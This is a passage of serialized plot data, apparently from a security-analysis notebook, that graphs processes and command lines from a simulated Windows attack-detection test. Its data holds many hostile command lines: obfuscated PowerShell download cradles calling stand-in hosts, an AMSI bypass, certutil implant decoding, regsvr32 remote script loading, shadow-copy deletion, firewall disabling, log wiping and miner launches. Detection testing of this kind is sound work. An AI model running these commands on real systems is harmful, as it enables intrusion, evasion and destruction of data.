pt\",\"x\":0.19345351784366474,\"x_offset\":5,\"y\":-0.029289904924952533,\"y_offset\":5},\"id\":\"5916\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"text_font_size\":\"7pt\",\"x\":-0.07628390148124999,\"x_offset\":5,\"y\":-0.30462511776906476,\"y_offset\":5},\"id\":\"5917\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"text_font_size\":\"7pt\",\"x\":0.014926763327991055,\"x_offset\":5,\"y\":-0.3889695025931138,\"y_offset\":5},\"id\":\"5918\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"text_font_size\":\"7pt\",\"x\":0.20850579254866947,\"x_offset\":5,\"y\":-0.4360580936418688,\"y_offset\":5},\"id\":\"5919\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"text_font_size\":\"7pt\",\"x\":0.46516977116349034,\"x_offset\":5,\"y\":-0.2005653712275663,\"y_offset\":5},\"id\":\"5920\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"text_font_size\":\"7pt\",\"x\":-0.550472454036076,\"x_offset\":5,\"y\":0.6362251901733806,\"y_offset\":5},\"id\":\"5921\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"text_font_size\":\"7pt\",\"x\":-0.47246116083587253,\"x_offset\":5,\"y\":0.7268573824290177,\"y_offset\":5},\"id\":\"5930\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"text_font_size\":\"7pt\",\"x\":0.35237538641095223,\"x_offset\":5,\"y\":-0.4646398434521892,\"y_offset\":5},\"id\":\"5922\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"text_font_size\":\"7pt\",\"x\":0.15542271587835138,\"x_offset\":5,\"y\":-0.6502923340706095,\"y_offset\":5},\"id\":\"5870\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"text_font_size\":\"7pt\",\"x\":-0.577704224810356,\"x_offset\":5,\"y\":0.7224050862074216,\"y_offset\":5},\"id\":\"5923\",\"type\":\"Label\"},{\"attributes\":{\"overlay\":{\"id\":\"5791\"}},\"id\":\"5787\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"text_font_size\":\"7pt\",\"x\":-0.21518301805670456,\"x_offset\":5,\"y\":-0.34834277507823774,\"y_offset\":5},\"id\":\"5924\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"text_font_size\":\"7pt\",\"x\":-0.29573888729142817,\"x_offset\":5,\"y\":0.9956709249030373,\"y_offset\":5},\"id\":\"5931\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"5789\",\"type\":\"ResetTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"text_font_size\":\"7pt\",\"x\":0.2988444933887351,\"x_offset\":5,\"y\":-0.6053903274508978,\"y_offset\":5},\"id\":\"5925\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"5788\",\"type\":\"SaveTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"text_font_size\":\"7pt\",\"x\":0.27090553103559384,\"x_offset\":5,\"y\":-0.2689091535946358,\"y_offset\":5},\"id\":\"5926\",\"type\":\"Label\"},{\"attributes\":{\"overlay\":{\"id\":\"5989\"}},\"id\":\"5858\",\"type\":\"BoxSelectTool\"},{\"attributes\":{\"callback\":null,\"renderers\":[{\"id\":\"5802\"}],\"tooltips\":[[\"node_type\",\"@node_type\"],[\"ParentProcessName\",\"@{ParentProcessName}\"],[\"SubjectLogonId\",\"@{SubjectLogonId}\"],[\"CommandLine\",\"@{CommandLine}\"],[\"SubjectDomainName\",\"@{SubjectDomainName}\"]]},\"id\":\"5851\",\"type\":\"HoverTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"text_font_size\":\"7pt\",\"x\":-0.004092994835612323,\"x_offset\":5,\"y\":-0.5039990101671498,\"y_offset\":5},\"id\":\"5871\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"5843\",\"type\":\"NodesAndLinkedEdges\"},{\"attributes\":{\"line_color\":{\"value\":\"#fdae61\"},\"line_width\":{\"value\":5}},\"id\":\"5823\",\"type\":\"MultiLine\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"text_font_size\":\"7pt\",\"x\":-0.07898892656283905,\"x_offset\":5,\"y\":0.8557690289163917,\"y_offset\":5},\"id\":\"5932\",\"type\":\"Label\"},{\"attributes\":{\"callback\":null},\"id\":\"5857\",\"type\":\"TapTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"text_font_size\":\"7pt\",\"x\":-0.3735264800722256,\"x_offset\":5,\"y\":1.0,\"y_offset\":5},\"id\":\"5928\",\"type\":\"Label\"},{\"attributes\":{\"fill_color\":{\"value\":\"#fdae61\"},\"size\":{\"value\":25}},\"id\":\"5838\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"5845\",\"type\":\"EdgesAndLinkedNodes\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"text_font_size\":\"7pt\",\"x\":-0.578019101580428,\"x_offset\":5,\"y\":0.8051136792370804,\"y_offset\":5},\"id\":\"5864\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"5983\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"line_color\":{\"value\":\"#abdda4\"},\"line_width\":{\"value\":5}},\"id\":\"5813\",\"type\":\"MultiLine\"},{\"attributes\":{},\"id\":\"5984\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"5986\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"5987\",\"type\":\"AllLabels\"},{\"attributes\":{\"graph_layout\":{\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\":[0.271831388779905,-0.005995121526477201],\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\":[0.3935432135954093,-0.16740013311844804],\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\":[0.3576371261732024,-0.563689489432099],\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\":[0.06790713849695593,-0.6593646768137651],\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\":[-0.07628390148124999,-0.30462511776906476],\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\":[-0.14956736066067797,-0.5293138834946636],\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\":[0.27410136423299425,-0.5139367537668998],\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\":[0.19574657907224996,-0.5599198654588227],\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\":[-0.0954108782808723,-0.21208195800496152],\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\":[0.15542271587835138,-0.6502923340706095],\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\":[-0.1168049000562655,-0.1266577171793987],\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\":[0.27209824793195414,-0.09977694307056818],\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\":[-0.03913474803407093,-0.07526631130102845],\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\":[-0.07540853049472264,-0.4229752335225487],\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\":[0.20850579254866947,-0.4360580936418688],\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\":[-0.2011221490297405,-0.4519135436959478],\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\":[0.316443282013049,-0.3773205571403094],\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\":[0.2988444933887351,-0.6053903274508978],\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\":[0.014926763327991055,-0.3889695025931138],\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\":[-0.08221524293234572,-0.5409453948221633],\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\":[0.38202815771716153,-0.28315958972400446],\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\":[0.19345351784366474,-0.029289904924952533],\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\":[-0.14857806450126337,-0.40920722366388],\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\":[0.017344975315473903,-0.5998874024567078],\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\":[0.42133713233536557,-0.10020024708105385],\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\":[0.4168776541587384,-0.5164848843907767],\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\":[0.15376975742717164,-0.12264929616864022],\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\":[0.1001215245160083,-0.4883591734773337],\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\":[-0.004092994835612323,-0.5039990101671498],\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\":[0.2315169124178805,-0.6384890399456846],\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\":[0.4123344789799406,-0.3798011727720773],\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\":[-0.1872196636991268,-0.20439926029634556],\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\":[0.10406496751603225,-0.5822007805615244],\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\":[0.0068954341583004316,-0.17219955309299667],\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\":[0.050089674221195625,-0.06656367184880788],\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\":[-0.43157786205987403,0.9513423278221045],\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\":[-0.578019101580428,0.8051136792370804],\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\":[-0.29573888729142817,0.9956709249030373],\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\":[-0.07898892656283905,0.8557690289163917],\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\":[-0.3735264800722256,1.0],\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\":[-0.21518301805670456,-0.34834277507823774],\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\":[0.35237538641095223,-0.4646398434521892],\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\":[0.48360428430500707,-0.3507690228087875],\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\":[-0.11338193962304313,0.7527995364008557],\"C:\\\\Windows\\\\System32\\\\Dism.exe\":[-0.13851732163324829,0.9390025994290533],\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\":[0.4694263442856573,-0.2772466116715998],\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\":[-0.21287141056931583,0.9870996903313551],\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\":[0.11484472569723479,-0.004621965834942047],\"C:\\\\Windows\\\\System32\\\\WerFault.exe\":[-0.577704224810356,0.7224050862074216],\"C:\\\\Windows\\\\System32\\\\cmd.exe\":[-0.058105459902981105,0.23918216234747827],\"C:\\\\Windows\\\\System32\\\\conhost.exe\":[-0.1348367431840454,0.20790831964556644],\"C:\\\\Windows\\\\System32\\\\cscript.exe\":[-0.34651860692659564,0.8803949965514453],\"C:\\\\Windows\\\\System32\\\\dllhost.exe\":[-0.5044714846014596,0.9328988268306628],\"C:\\\\Windows\\\\System32\\\\net.exe\":[-0.053855352092441224,-0.6133265941896405],\"C:\\\\Windows\\\\System32\\\\net1.exe\":[0.4589099324236468,-0.44499916191084204],\"C:\\\\Windows\\\\System32\\\\sc.exe\":[0.46516977116349034,-0.2005653712275663],\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\":[-0.2518534543229007,0.8958743987674823],\"C:\\\\Windows\\\\System32\\\\svchost.exe\":[-0.093784838204445,0.21689034774215699],\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\":[-0.47246116083587253,0.7268573824290177],\"C:\\\\Windows\\\\System32\\\\tasklist.exe\":[0.27090553103559384,-0.2689091535946358],\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\":[0.35007218618228747,-0.05000951493342474],\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\":[-0.4313491682790702,0.8259104293947078],\"C:\\\\Windows\\\\System32\\\\wermgr.exe\":[-0.550472454036076,0.6362251901733806],\"C:\\\\Windows\\\\System32\\\\whoami.exe\":[-0.17715031837733042,-0.28386997242375606],\"C:\\\\Windows\\\\System32\\\\win32calc.exe\":[0.31245272291111403,-0.18155225887607962],\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\":[-0.5276987418295824,0.8609835777614369],\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\":[-0.17574649405873288,0.8368759208175014],\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\":[-0.45616448933819376,0.6061903305416503],\"MSTICAdmin\":[0.12786936150290706,-0.29223382453024754],\"MSTICAlertsWin1$\":[-0.29665616570914644,0.6944744827277544]}},\"id\":\"5812\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{},\"id\":\"5990\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"5991\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5992\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"5782\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5781\"},\"coordinates\":null,\"dimension\":1,\"group\":null,\"ticker\":null},\"id\":\"5784\",\"type\":\"Grid\"},{\"attributes\":{\"source\":{\"id\":\"5805\"}},\"id\":\"5807\",\"type\":\"CDSView\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5805\"},\"glyph\":{\"id\":\"5818\"},\"group\":null,\"hover_glyph\":{\"id\":\"5813\"},\"selection_glyph\":{\"id\":\"5823\"},\"view\":{\"id\":\"5807\"}},\"id\":\"5806\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5993\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5778\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5777\"},\"coordinates\":null,\"group\":null,\"ticker\":null},\"id\":\"5780\",\"type\":\"Grid\"},{\"attributes\":{\"data\":{\"CommandLine\":[null,\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",null,\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !, reg.exe, .\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue, .\\\\reg query add mscfile\\\\\\\\\\\\\\\\open, .\\\\reg add Image File Execution Options sethc.exe, .\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f, .\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f, .\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1, .\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\", .\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\", .\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"cmd /c \\\"systeminfo && systeminfo\\\", .\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\", .\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\", .\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\", .\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\", .\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\", .\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\", cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\", cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\", cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\", cmd /c \\\".\\\\n^e^t u^se^r\\\", cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\", cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" , cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close), cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\", cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") , cmd /c \\\"powershell wscript.shell used to download a .gif\\\", cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\", cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\", cmd /c echo rundll32.exe perfc.dat, cmd /c echo /e:vbscript.encode /b, cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\".\\\\rundll32 /C 42424.exe, .\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe, .\\\\rundll32 /C 1234.exe, .\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe, .\\\\rundll32 /C reg.exe, .\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!), .\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll, .\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"42424.exe\",\"1234.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\", .\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe, netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt, c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all, netsh.exe PortOpenning\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp, cmd /c echo Any questions about the commands executed here then please contact one of, cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com, c:\\\\Windows\\\\System32\\\\cmd.exe /c net user, \\\"cmd\\\"\",\"net user adm1nistrator Bob_testing /add, net share TestShare=c:\\\\testshare /Grant:Users,Read, net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator, net use q: /delete, net share TestShare /delete, net user adm1nistrator /delete, net localgroup Administrators, net user Bob1 /domain, net user BobX /domain, net group \\\"Domain Admins\\\" /domain, net use v: \\\\\\\\tsclient\\\\c, net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add, C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read, C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete, C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator /delete, C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators, C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain, C:\\\\Windows\\\\system32\\\\net1 user BobX /domain, C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain, C:\\\\Windows\\\\system32\\\\net1 v: /delete, C:\\\\Windows\\\\system32\\\\net1\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll, .\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx, c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious, C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}, .\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\", .\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}, .\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA, .\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\", .\\\\powershell Invoke-Shellcode.ps1, .\\\\powershell Invoke-ReverseDnsLookup.ps1, .\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\", .\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"certutil -decode delme.b64 implant.exe, certutil -urlcache -split -f http://127.0.0.1/ \",\"implant.exe k111, implant.exe 81ed03caf6901e444c72ac67d192fb9c, implant.exe -b -t -m\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding, C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"whoami\",\"hostname\",\"netstat -an\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt, odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port, mt.exe smb\",\"hd.exe -pslist, hd.exe -enum\",\"sc 